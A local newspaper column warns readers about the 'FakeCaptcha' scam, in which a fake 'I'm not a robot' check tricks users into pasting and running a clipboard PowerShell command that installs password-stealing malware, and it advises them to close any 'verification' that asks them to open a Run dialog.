Catch Of The Week: Prove You’re Human (While Getting Hacked)

By REBECCA RUTHERFORD
Los Alamos
For the Los Alamos Daily Post

You know that annoying “I’m not a robot” checkbox you click seventeen times a day without thinking? Turns out, that automatic, muscle memory click is exactly what cybercriminals are counting on. Yikes!

A nasty scam called FakeCaptcha has been making the rounds, and it is disturbingly simple.

You land on a compromised website, a CAPTCHA pops up, you click “I’m not a robot” and without knowing it, a PowerShell script gets copied to your clipboard. The fake verification then walks you through three steps: press Win + R to open the Run dialog, press Ctrl + V to paste in that clipboard contents, and press Enter to execute it. Congratulations. You just installed malware on your own machine. With your own hands. While trying to prove you were a responsible human person, by helping the nice robots identify traffic lights.

The danger is the familiarity. CAPTCHAs are everywhere. We click them so many times that we don’t even think about it. This makes it a lot easier to fall for the scam, and cyber criminals are well aware of this.

The consequences are not minor. The malware delivered through these fake CAPTCHAs includes the Lumma Stealer and the Amadey Trojan, which steal passwords, cookies, and cryptocurrency wallet details. Security researchers have also seen it deliver ransomware linked payloads with the potential for devastating impact for organizations or individuals. And it’s not just sketchy corners of the internet. In at least one documented case, a victim hit the fake CAPTCHA after visiting their own company’s legitimate WordPress site, which had been quietly compromised and turned into a trap.

A real CAPTCHA asks you to identify fire hydrants or other everyday objects. It does not ask you to paste anything into your computer. Ever. If a “verification” step involves opening a Run dialog or a terminal window, close the browser tab and walk away. That is not a security check, your computer is about to get compromised.

It’s easy to fall into a routine, and just click through the boxes without thinking, but that can be a dangerous place to be. Take the time to stop and think, figure out if it makes sense, and save yourself from the latest scam.

Editor’s note: Rebecca Rutherford works in information technology at Los Alamos National Laboratory.

Search
LOS ALAMOS

ladailypost.com website support locally by OviNuppi Systems